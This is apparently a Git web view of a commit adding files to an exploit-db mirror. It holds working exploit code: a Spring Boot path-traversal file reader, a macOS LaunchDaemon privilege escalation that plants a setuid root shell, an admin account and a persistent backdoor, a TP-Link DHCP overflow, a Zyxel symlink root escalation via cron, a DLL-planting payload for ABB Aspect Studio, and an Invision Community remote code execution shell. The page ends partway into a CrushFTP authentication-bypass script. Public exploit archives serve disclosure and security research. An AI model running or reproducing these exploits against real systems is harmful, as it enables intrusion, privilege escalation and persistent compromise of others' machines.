bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Merge remote-tracking branch 'exploitdb/main'

Browse source
This commit is contained in:
Brendan McDevitt 2025-06-06 00:55:43 +00:00
commit bf635dcdf2
32 changed files with 4879 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

57
exploits/java/webapps/52304.py Executable file
View file

@ -0,0 +1,57 @@
# Exploit Title: Java-springboot-codebase 1.1 - Arbitrary File Read
# Google Dork:
# Date: 23/May/2025
# Exploit Author: d3sca
# Vendor Homepage: https://github.com/OsamaTaher/Java-springboot-codebase
# Software Link: https://github.com/OsamaTaher/Java-springboot-codebase
# Version: [app version] 1.1
# Tested on: Debian Linux
# CVE : CVE-2025-46822
#usage: python3 cve-2025-46822.py http://victim.com /etc/passwd
import argparse
import requests
from urllib.parse import quote
def exploit(target, file_path, output=None):
# Ensure the file path is absolute
if not file_path.startswith('/'):
print("[!] Warning: File path is not absolute. Prepending '/' to make it absolute.")
file_path = '/' + file_path.lstrip('/')
# URL-encode the file path
encoded_path = quote(file_path, safe='')
# Construct the target URL
endpoint = f"/api/v1/files/{encoded_path}"
url = target.rstrip('/') + endpoint
print(f"[*] Attempting to retrieve: {file_path}")
print(f"[*] Sending request to: {url}")
try:
response = requests.get(url, allow_redirects=False, timeout=10)
if response.status_code == 200:
print("[+] File retrieved successfully!")
if output:
with open(output, 'wb') as f:
f.write(response.content)
print(f"[+] Content saved to: {output}")
else:
print("\nFile contents:")
print(response.text)
else:
print(f"[-] Failed to retrieve file. Status code: {response.status_code}")
print(f"[-] Response: {response.text[:200]}") # Show first 200 chars of response
except Exception as e:
print(f"[-] An error occurred: {str(e)}")
if name == "main":
parser = argparse.ArgumentParser(description="Exploit Path Traversal Vulnerability in Unauthenticated File API")
parser.add_argument("target", help="Target base URL (e.g., http://victim:8080)")
parser.add_argument("file_path", help="Absolute path to target file (e.g., /etc/passwd)")
parser.add_argument("-o", "--output", help="Output file to save contents")
args = parser.parse_args()
exploit(args.target, args.file_path, args.output)

100
exploits/macos/local/52316.py Executable file
View file

@ -0,0 +1,100 @@
#!/usr/bin/env python3
# Exploit Title: macOS LaunchDaemon iOS 17.2 - Privilege Escalation
# Author: Mohammed Idrees Banyamer (@banyamer_security)
# GitHub: https://github.com/mbanyamer
# Date: 2025-05-31
# Tested on: macOS Sonoma (14.x ARM64 / x86_64)
# CVE: CVE-2025-24085
# Type: Local Privilege Escalation
# Platform: macOS
# Author Country: Jordan
# Description:
# This local privilege escalation exploit leverages a vulnerable macOS LaunchDaemon plist configuration to execute
# arbitrary commands with root privileges. The exploit creates a root payload script that adds a root shell binary,
# creates an admin user, and installs a persistent LaunchDaemon backdoor for root access. It hijacks the
# com.apple.securemonitor LaunchDaemon plist to trigger the payload, allowing unauthorized escalation to root
# on macOS Sonoma systems.
import os
import plistlib
import time
from pathlib import Path
LAUNCHD_PLIST = "/Library/LaunchDaemons/com.apple.securemonitor.plist"
PAYLOAD_SCRIPT = "/tmp/.macroot_payload.sh"
def create_payload():
print("[+] Creating root payload script...")
payload = """#!/bin/bash
# Root shell
cp /bin/bash /tmp/.rootbash
chmod +s /tmp/.rootbash
chown root:wheel /tmp/.rootbash
# Add admin user
sysadminctl -addUser pentest -password macOS123! -admin
# Log file
echo "[+] Root backdoor triggered at $(date)" >> /tmp/.rootlog
# Persistent backdoor
cat <<EOF > /Library/LaunchDaemons/com.apple.backdoor.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key><string>com.apple.backdoor</string>
<key>ProgramArguments</key><array><string>/tmp/.rootbash</string></array>
<key>RunAtLoad</key><true/>
</dict>
</plist>
EOF
chmod 644 /Library/LaunchDaemons/com.apple.backdoor.plist
chown root:wheel /Library/LaunchDaemons/com.apple.backdoor.plist
"""
with open(PAYLOAD_SCRIPT, "w") as f:
f.write(payload)
os.chmod(PAYLOAD_SCRIPT, 0o755)
def hijack_launchdaemon():
print("[+] Hijacking LaunchDaemon plist...")
if not Path(LAUNCHD_PLIST).exists():
# create a fake one
print("[*] Creating fake LaunchDaemon plist for exploitation...")
plist_data = {
'Label': 'com.apple.securemonitor',
'ProgramArguments': [PAYLOAD_SCRIPT],
'RunAtLoad': True,
}
with open(LAUNCHD_PLIST, "wb") as f:
plistlib.dump(plist_data, f)
else:
# hijack existing one
with open(LAUNCHD_PLIST, 'rb') as f:
plist = plistlib.load(f)
plist['ProgramArguments'] = [PAYLOAD_SCRIPT]
plist['RunAtLoad'] = True
with open(LAUNCHD_PLIST, 'wb') as f:
plistlib.dump(plist, f)
os.system(f"chmod 644 {LAUNCHD_PLIST}")
os.system(f"chown root:wheel {LAUNCHD_PLIST}")
def trigger_payload():
print("[+] Triggering LaunchDaemon manually...")
os.system(f"sudo launchctl load -w {LAUNCHD_PLIST}")
print("[+] Done. You can now execute /tmp/.rootbash -p for root shell")
def main():
if os.geteuid() == 0:
print("[!] You are already root. No need to exploit.")
return
create_payload()
hijack_launchdaemon()
print("[+] Exploit completed. Reboot or run manually:")
print(f" sudo launchctl load -w {LAUNCHD_PLIST}")
print(" Then run: /tmp/.rootbash -p")
if __name__ == "__main__":
main()

20
exploits/multiple/local/52289.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: RDPGuard 9.9.9 - Privilege Escalation
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 09.05.2025
# Vendor Homepage: https://rdpguard.com
# Software Link: https://rdpguard.com/download.aspx
# Tested Version: 9.9.9 (latest)
# Tested on: Windows 10 (32bit)
# # # Steps to Reproduce # # #
# 1. Prepare a .bat file containing your reverse shell code.
# 2. Open RDPGuard.
# 3. Navigate to Tools > Custom Actions / Notifications.
# 4. Click the "Add" button.
# 5. Leave "Event" as "IP Blocked".
# 6. Select "Execute Program" from the "Action" dropdown.
# 7. Under the "Program/script" field, select your prepared .bat file.
# 8. Set up your listener.
# 9. Click "Test Run".
# 10. A reverse shell as NT AUTHORITY\SYSTEM is obtained!

338
exploits/multiple/local/52292.c Normal file
View file

@ -0,0 +1,338 @@
/*
* Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021) - DHCP Stack Buffer Overflow
* Date: 10/20/2024
* Exploit Author: Mohamed Maatallah
* Vendor Homepage: https://www.tp-link.com
* Version: TT_V6.2.1021 (VN020-F3v(T))
* Tested on: VN020-F3v(T) Router (Hardware Version 1.0)
* CVE: CVE-2024-11237
* Category: Remote
* Technical Details:
* -----------------
* - Triggers multiple memory corruption vectors in DHCP parsing
* - Primary vector: Stack overflow via oversized hostname (127 bytes)
* - Secondary vector: Parser confusion via malformed length fields
* - Tertiary vector: Vendor specific option parsing edge case
*
* Attack Surface:
* --------------
* - DHCP service running on port 67
* - Processes broadcast DISCOVER packets
* - No authentication required
* - Affects all routers running VN020 F3v(t) specifically the ones
* supplied by Tunisie Telecom & Topnet
*
* Exploitation Method:
* ------------------
* 1. Sends crafted DHCP DISCOVER packet
* 2. Overflows hostname buffer (64 -> 127 bytes)
* 3. Corrupts length fields in DHCP options
* 4. Success = No response (service crash)
*
* Build:
* ------
* Windows: cl poc.c /o tplink_dhcp.exe or use visual studio directly.
*
* Usage:
* ------
* tplink_dhcp.exe
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#include <Ws2tcpip.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
// Standard DHCP ports - Server listens on 67, clients send from 68
#define DHCP_SERVER_PORT 67
#define DHCP_CLIENT_PORT 68
#define MAX_PACKET_SIZE 1024 // Maximum size for DHCP packet
#define MAX_ATTEMPTS 3
// Forward declarations of functions
void create_dhcp_discover_packet(unsigned char* packet, int* packet_length);
void add_option(unsigned char* packet, int* offset, unsigned char option,
unsigned char length, unsigned char* data);
void tp_link(unsigned char* packet, int* offset);
void print_packet_hex(unsigned char* packet, int length);
int wait_for_response(SOCKET sock, int timeout);
int main() {
WSADATA wsa;
SOCKET sock;
struct sockaddr_in dest;
unsigned char packet[MAX_PACKET_SIZE]; // Buffer for DHCP packet
int packet_length = 0; // Length of constructed packet
int attempts = 0; // Counter for send attempts
int success = 0;
printf("[TP-Thumper] Initializing Winsock...\n");
if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {
printf("[TP-Thumper] Winsock initialization failed. Error: %d\n",
WSAGetLastError());
return 1;
}
sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if (sock == INVALID_SOCKET) {
printf("[TP-Thumper] Could not create socket. Error: %d\n",
WSAGetLastError());
WSACleanup();
return 1;
}
// Set up broadcast address (255.255.255.255)
dest.sin_family = AF_INET;
dest.sin_port = htons(DHCP_SERVER_PORT);
dest.sin_addr.s_addr = inet_addr("255.255.255.255");
// Enable broadcast mode on socket
BOOL broadcast = TRUE;
if (setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char*)&broadcast,
sizeof(broadcast)) < 0) {
printf("[TP-Thumper] Broadcast mode failed.\n");
closesocket(sock);
WSACleanup();
return 1;
}
srand((unsigned int)time(NULL));
// Create the DHCP DISCOVER packet
create_dhcp_discover_packet(packet, &packet_length);
// Main attempt loop - tries to send packet MAX_ATTEMPTS times
while (attempts < MAX_ATTEMPTS && !success) {
printf("[TP-Thumper] Sending DHCP Discover packet (Attempt %d/%d)...\n",
attempts + 1, MAX_ATTEMPTS);
print_packet_hex(packet, packet_length); //debug
// Send the packet
if (sendto(sock, (char*)packet, packet_length, 0, (struct sockaddr*)&dest,
sizeof(dest)) < 0) {
printf("[TP-Thumper] Packet send failed. Error: %d\n", WSAGetLastError());
}
else {
printf("[TP-Thumper] Packet sent. Waiting for router response...\n");
if (wait_for_response(sock, 10)) {
printf(
"[TP-Thumper] Router responded! Exploit may not have succeeded.\n");
success = 1;
}
else {
printf("[TP-Thumper] No response received within timeout.\n");
}
}
attempts++;
}
if (!success) {
printf(
"[TP-Thumper] Exploit succeeded: No router response after %d "
"attempts.\n",
MAX_ATTEMPTS);
}
else {
printf("[TP-Thumper] Exploit failed: Router responded within timeout.\n");
}
// Cleanup
closesocket(sock);
WSACleanup();
return 0;
}
/*
* DHCP Message Format:
* [0x00]: op = 0x01 ; BOOTREQUEST
* [0x01]: htype = 0x01 ; Ethernet
* [0x02]: hlen = 0x06 ; MAC addr len
* [0x03]: hops = 0x00 ; No relay
* [0x04-0x07]: xid ; Random transaction ID
* [0x08-0x0F]: secs + flags ; Broadcast flags set
* [0x10-0x1F]: ciaddr + yiaddr ; Empty
* [0x20-0x27]: siaddr + giaddr ; Empty
* [0x28-0x2D]: chaddr ; Crafted MAC
*/
void create_dhcp_discover_packet(unsigned char* packet, int* packet_length) {
memset(packet, 0, MAX_PACKET_SIZE);
int offset = 0;
// DHCP Header - Standard fields
packet[offset++] = 0x01; // BOOTREQUEST
packet[offset++] = 0x01; // Ethernet
packet[offset++] = 0x06; // MAC len
packet[offset++] = 0x00; // No hops
// ; XID - rand() used for bypass of response filtering
// ; mov eax, rand()
// ; mov [packet + 4], eax
unsigned int xid = (unsigned int)rand();
*((unsigned int*)&packet[offset]) = htonl(xid);
offset += 4;
// ; Flags - Set broadcast bit to force response
// ; mov word [packet + 8], 0x0000 ; secs elapsed
// ; mov word [packet + 10], 0x8000 ; broadcast flag
packet[offset++] = 0x00;
packet[offset++] = 0x00;
packet[offset++] = 0x80;
packet[offset++] = 0x00;
// Zero IP fields - forces DHCP server parse
memset(&packet[offset], 0, 16);
offset += 16;
// ; Crafted MAC - DE:AD:BE:EF:00:01
// ; Used for unique client tracking, bypasses MAC filters
packet[offset++] = 0xDE;
packet[offset++] = 0xAD;
packet[offset++] = 0xBE;
packet[offset++] = 0xEF;
packet[offset++] = 0x00;
packet[offset++] = 0x01;
memset(&packet[offset], 0x00, 10);
offset += 10;
// ; Skip server name/boot filename
// ; Total padding: 192 bytes
memset(&packet[offset], 0x00, 64);
offset += 64;
memset(&packet[offset], 0x00, 128);
offset += 128;
// ; DHCP Magic Cookie
// ; 0x63825363 = DHCP in natural order
packet[offset++] = 0x63;
packet[offset++] = 0x82;
packet[offset++] = 0x53;
packet[offset++] = 0x63;
// ; Stack layout after this point:
// ; [ebp+0] = DHCP header
// ; [ebp+240] = DHCP options start
// ; Router parses sequentially from this point
add_option(packet, &offset, 0x35, 0x01, (unsigned char[]) { 0x01 });
add_option(packet, &offset, 0x37, 4,
(unsigned char[]) {
0x01, 0x03, 0x06, 0x0F
});
// ; Trigger overflow conditions
tp_link(packet, &offset);
packet[offset++] = 0xFF; // End option
*packet_length = offset;
}
void tp_link(unsigned char* packet, int* offset) {
// ; Vendor specific overflow - triggers parser state confusion
// ; 0x00,0x14,0x22 = TP-Link vendor prefix
// ; Following 0xFF bytes cause length validation bypass
unsigned char vendor_specific[] = { 0x00, 0x14, 0x22, 0xFF, 0xFF, 0xFF };
add_option(packet, offset, 0x2B, sizeof(vendor_specific), vendor_specific);
// ; Stack buffer overflow via hostname
// ; Router allocates 64-byte buffer but we send 127
// ; Overwrites adjacent stack frame
unsigned char long_hostname[128];
memset(long_hostname, 'A', sizeof(long_hostname) - 1);
long_hostname[127] = '\0';
add_option(packet, offset, 0x0C, 127, long_hostname);
// ; Length field exploit
// ; Claims 255 bytes but only sends 1
// ; Router assumes full length during memory operations
// ; leads to read/write past buffer
add_option(packet, offset, 0x3D, 0xFF, (unsigned char[]) { 0x01 });
}
// ; Helper for DHCP option construction
// ; option = option code
// ; length = claimed length (can be falsified)
// ; data = actual payload
void add_option(unsigned char* packet, int* offset, unsigned char option,
unsigned char length, unsigned char* data) {
packet[(*offset)++] = option; // Option type
packet[(*offset)++] = length; // Claimed length
memcpy(&packet[*offset], data, length);
*offset += length;
}
// Debug
void print_packet_hex(unsigned char* packet, int length) {
printf("[TP-Thumper] Packet Hex Dump:\n");
// Print header fields with labels
printf("Opcode (op): %02X\n", packet[0]);
printf("Hardware Type (htype): %02X\n", packet[1]);
printf("Hardware Address Length (hlen): %02X\n", packet[2]);
printf("Hops: %02X\n", packet[3]);
// Transaction ID
printf("Transaction ID (xid): ");
for (int i = 4; i < 8; i++) {
printf("%02X ", packet[i]);
}
printf("\n");
// Flags
printf("Flags: ");
for (int i = 10; i < 12; i++) {
printf("%02X ", packet[i]);
}
printf("\n");
// Client Hardware Address (MAC)
printf("Client Hardware Address (chaddr): ");
for (int i = 28; i < 34; i++) {
printf("%02X ", packet[i]);
}
printf("\n");
// DHCP Magic Cookie
printf("Magic Cookie: ");
for (int i = 236; i < 240; i++) {
printf("%02X ", packet[i]);
}
printf("\n");
// DHCP Options
printf("DHCP Options:\n");
int i = 240;
while (i < length) {
printf(" Option: %02X, Length: %02X, Data: ", packet[i], packet[i + 1]);
int option_length = packet[i + 1];
for (int j = 0; j < option_length; j++) {
printf("%02X ", packet[i + 2 + j]);
}
printf("\n");
i += 2 + option_length;
if (packet[i] == 0xFF) {
printf(" End of Options\n");
break;
}
}
}
// Wait for router response with timeout
int wait_for_response(SOCKET sock, int timeout) {
struct timeval tv;
tv.tv_sec = timeout;
tv.tv_usec = 0;
// Set up file descriptor set for select()
fd_set readfds;
FD_ZERO(&readfds);
FD_SET(sock, &readfds);
// Wait for data or timeout
int result = select(0, &readfds, NULL, NULL, &tv);
return result > 0; // Returns true if data available
}

131
exploits/multiple/local/52293.bash Normal file
View file

@ -0,0 +1,131 @@
# Exploit Title: Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation
# Date: 2025-04-23
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.zyxel.com/
# Version: Zyxel uOS V1.31 (see
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-=
=3D
advisory-for-incorrect-permission-assignment-and-improper-privilege-managem=
=3D
ent-vulnerabilities-in-usg-flex-h-series-firewalls-04-22-2025)
# Tested on: Zyxel FLEX100H with Firmware V1.31(ABXF.0) and Zyxel
FLEX200H with Firmware V1.31(ABWV.0)
# CVE: CVE-2025-1731
#!/bin/sh
#
# raptor_fermion - Zyxel fermion-wrapper root LPE exploit
# Copyright (c) 2025 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# "So we wait, this is our labour... we wait."
# -- Anthony Swofford on fuzzing
#
# The setuid root binary program `/usr/sbin/fermion-wrapper` distributed by
# Zyxel with some of their appliances follows symbolic links in the `/tmp`
# directory when run with the `register-status` argument. This allows local
# users with access to a Linux OS shell to trick the program into creating
# writable files at arbitrary locations in the filesystem. This vulnerability
# can be exploited to overwrite arbitrary files or locally escalate privileges
# from low-privileged user (e.g., `postgres`) to root.
#
# Note: the `/tmp` directory doesn't have the sticky bit set, which simplifies
# exploitation of this vulnerability and may also cause all sorts of havoc.
#
# ## Vulnerability information
#
# * CVE ID - CVE-2025-1731
# * High - 7.8 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
# * CWE-61 - https://cwe.mitre.org/data/definitions/61.html
#
# ## Relevant links
#
# * https://github.com/hnsecurity/vulns/blob/main/HNS-2025-10-zyxel-fermion.txt
# * https://security.humanativaspa.it/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731
# * https://0xdeadc0de.xyz/blog/cve-2025-1731_cve-2025-1732
# * https://security.humanativaspa.it/tag/zyxel/
#
# ## Usage example
#
# ```
# $ ./raptor_fermion
# raptor_fermion - Zyxel fermion-wrapper root LPE exploit
# Copyright (c) 2025 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# [*] Exploiting /usr/sbin/fermion-wrapper
# $ uname -a
# Linux FLEX100H-HackerHood 4.14.207-10.3.7.0-2 #5 SMP PREEMPT Thu Jan 9 04:34:58 UTC 2025 aarch64 GNU/Linux
# $ id
# uid=502(postgres) gid=502(postgres) groups=502(postgres)
# $ ls -l /usr/sbin/fermion-wrapper
# -rwsr-xr-x 1 root root 44288 Jan 9 05:34 /usr/sbin/fermion-wrapper
# {"status": 0, "registered": 1, "nebula_registered": 1, "bundle": 1}
#
# [+] Everything looks good \o/, wait an hour and check /tmp/pwned
# $ ls -l /etc/cron.d/runme
# -rw-rw-rw- 1 root postgres 79 Feb 14 15:52 /etc/cron.d/runme
# $ cat /etc/cron.d/runme
# * * * * * cp /bin/sh /tmp/pwned; chmod 4755 /tmp/pwned; rm /etc/cron.d/runme
#
# [+] Run the shell as follows to bypass bash checks: /tmp/pwned -p
#
# [about one hour later...]
#
# $ ls -l /tmp/pwned
# -rwsr-xr-x 1 root root 916608 Feb 14 16:25 /tmp/pwned
# $ /tmp/pwned -p
# # id
# uid=502(postgres) gid=502(postgres) euid=0(root) groups=502(postgres)
# # R00t D4nc3!!!111! \o/
# ```
#
# ## Tested on
#
# * Zyxel FLEX100H with Firmware V1.31(ABXF.0) | 2025-01-09 04:35:47
# * Zyxel FLEX200H with Firmware V1.31(ABWV.0) | 2025-01-09 05:11:31
#
# *Note: other products and firmware versions may also be vulnerable.*
#
# ## Special thanks
#
# * Alessandro Sgreccia (@rainpwn) of HackerHood for his research and devices
#
echo "raptor_fermion - Zyxel fermion-wrapper root LPE exploit"
echo "Copyright (c) 2025 Marco Ivaldi <raptor@0xdeadbeef.info>"
echo
target="/usr/sbin/fermion-wrapper"
tmpfile="/tmp/register_status"
runme="/etc/cron.d/runme"
shell="/tmp/pwned"
echo "[*] Exploiting $target"
echo "$ uname -a"
uname -a
echo "$ id"
id
echo "$ ls -l $target"
ls -l $target
umask 0
rm $tmpfile
ln -s $runme /tmp/register_status
$target register-status
echo "* * * * * cp /bin/sh $shell; chmod 4755 $shell; rm $runme" > $runme
if [ "`cat $runme 2>/dev/null`" = "" ]; then
echo "[!] Error: something went wrong ¯\\_(ツ)_/¯"
exit 1
fi
echo
echo "[+] Everything looks good \\o/, wait an hour and check $shell"
echo "$ ls -l $runme"
ls -l $runme
echo "$ cat $runme"
cat $runme
echo
echo "[+] Run the shell as follows to bypass bash checks: $shell -p"
echo

111
exploits/multiple/local/52306.txt Normal file
View file

@ -0,0 +1,111 @@
# Exploit Title: ABB Cylon Aspect Studio 3.08.03 - Binary Planting
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: <=3.08.03
# Tested on: Microsoft Windows 10 Home (EN) OpenJDK 64-Bit Server VM Temurin-21.0.6+7
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
# Advisory ID: ZSL-2025-5952
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5952.php
# CVE ID: CVE-2024-13946
# CVE URL: https://www.cve.org/CVERecord/SearchResults?query=CVE-2024-13946
C:\> type project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
C:\Aspect\Aspect-Studio-3.08.03> del CylonLicence.dll
C:\Aspect\Aspect-Studio-3.08.03> type aspect.bat
REM 64bit parameters
jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding="UTF-8" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar
C:\Aspect\Aspect-Studio-3.08.03-a09>aspect.bat
C:\Aspect\Aspect-Studio-3.08.03-a09>REM 64bit parameters
C:\Aspect\Aspect-Studio-3.08.03-a09>jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding="UTF-8" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar
C:\Aspect\Aspect-Studio-3.08.03> type AspectStudio.class
...
...
System.loadLibrary("CylonLicence");
} catch (Throwable t) {}
LoggerUtil.logger.error("Error loading license DLL", t);
}
}
...
...
C:\Aspect\Aspect-Studio-3.08.03> cd logs
C:\Aspect\Aspect-Studio-3.08.03\logs>type AspectStudio.log
ERROR: 2025-01-16 16:47:58,579 Error loading license DLL [main]
java.lang.UnsatisfiedLinkError: no CylonLicence in java.library.path
at java.lang.ClassLoader.loadLibrary(ClassLoader.java:1867)
at java.lang.Runtime.loadLibrary0(Runtime.java:870)
at java.lang.System.loadLibrary(System.java:1122)
at com.aamatrix.util.AspectStudio.<clinit>(AspectStudio.java:42)
at com.aamatrix.vib.rrobin.CylonLicense.<init>(CylonLicense.java:18)
at com.aamatrix.vib.rrobin.LicenseService.<init>(LicenseService.java:38)
at com.aamatrix.vib.rrobin.LicenseService.<clinit>(LicenseService.java:34)
at com.aamatrix.projectmanager.AspectStudio.<clinit>(AspectStudio.java:52)
at java.lang.Class.forName0(Native Method)
at java.lang.Class.forName(Class.java:348)
at com.aamatrix.projectmanager.AspectStudioLauncher.main(AspectStudioLauncher.java:70)
...
...
C:\DLL-Mala> type CylonLicence.cpp
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <shellapi.h>
extern "C" __declspec(dllexport)
DWORD WINAPI ExecuteCmdThread(LPVOID lpParam) {
ShellExecuteW(NULL, L"open", L"cmd.exe", L"/c start", NULL, SW_SHOWNORMAL);
return 0;
}
extern "C" __declspec(dllexport)
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
CreateThread(NULL, 0, ExecuteCmdThread, NULL, 0, NULL);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

56
exploits/multiple/remote/52294.php Normal file
View file

@ -0,0 +1,56 @@
<?php
/*
---------------------------------------------------------------------------
Exploit Title: Invision Community 5.0.6 - Remote Code Execution (RCE)
---------------------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://invisioncommunity.com
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Original Advisory:
https://karmainsecurity.com/KIS-2025-02
*/
set_time_limit(0);
error_reporting(E_ERROR);
print "\n+-------------------------------------------------------------------+";
print "\n| Invision Community <= 5.0.6 Remote Code Execution Exploit by EgiX |";
print "\n+-------------------------------------------------------------------+\n";
if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
if ($argc != 2)
{
print "\nUsage......: php $argv[0] <URL>\n";
print "\nExample....: php $argv[0] http://localhost/invision/";
print "\nExample....: php $argv[0] https://invisioncommunity.com/\n\n";
die();
}
$ch = curl_init();
$params = ["app" => "core", "module" => "system", "controller" => "themeeditor", "do" => "customCss"];
curl_setopt($ch, CURLOPT_URL, $argv[1]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
while (1)
{
print "\ninvision-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$params["content"] = sprintf("{expression=\"die('________'.system(base64_decode('%s')))\"}", base64_encode($cmd));
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
preg_match("/(.*)________/s", curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}

609
exploits/multiple/remote/52295.py Executable file
View file

@ -0,0 +1,609 @@
# Exploit Title: CrushFTP 11.3.1 - Authentication Bypass
# Date: 2025-05-15
# Exploit Author: @İbrahimsql
# Exploit Author's github: https://github.com/ibrahimsql
# Vendor Homepage: https://www.crushftp.com
# Software Link: https://www.crushftp.com/download.html
# Version: < 10.8.4, < 11.3.1
# Tested on: Ubuntu 22.04 LTS, Windows Server 2019, Kali Linux 2024.1
# CVE: CVE-2025-31161
# Description:
# CrushFTP before 10.8.4 and 11.3.1 allows unauthenticated HTTP(S) port access and full admin takeover
# through a race condition and header parsing logic flaw in the AWS4-HMAC authorization mechanism.
# Exploiting this allows bypassing authentication and logging in as any known user (e.g. crushadmin).
# Requirements: requests>=2.28.1 , colorama>=0.4.6 , urllib3>=1.26.12 , prettytable>=2.5.0 , rich>=12.6.0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import concurrent.futures
import json
import logging
import os
import random
import re
import socket
import string
import sys
import time
from datetime import datetime
from typing import Dict, List, Optional, Tuple, Union
import requests
import urllib3
from colorama import Fore, Style, init
from prettytable import PrettyTable
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, TimeRemainingColumn
# Initialize colorama
init(autoreset=True)
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Initialize Rich console
console = Console()
# Global variables
VERSION = "2.0.0"
USER_AGENTS = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
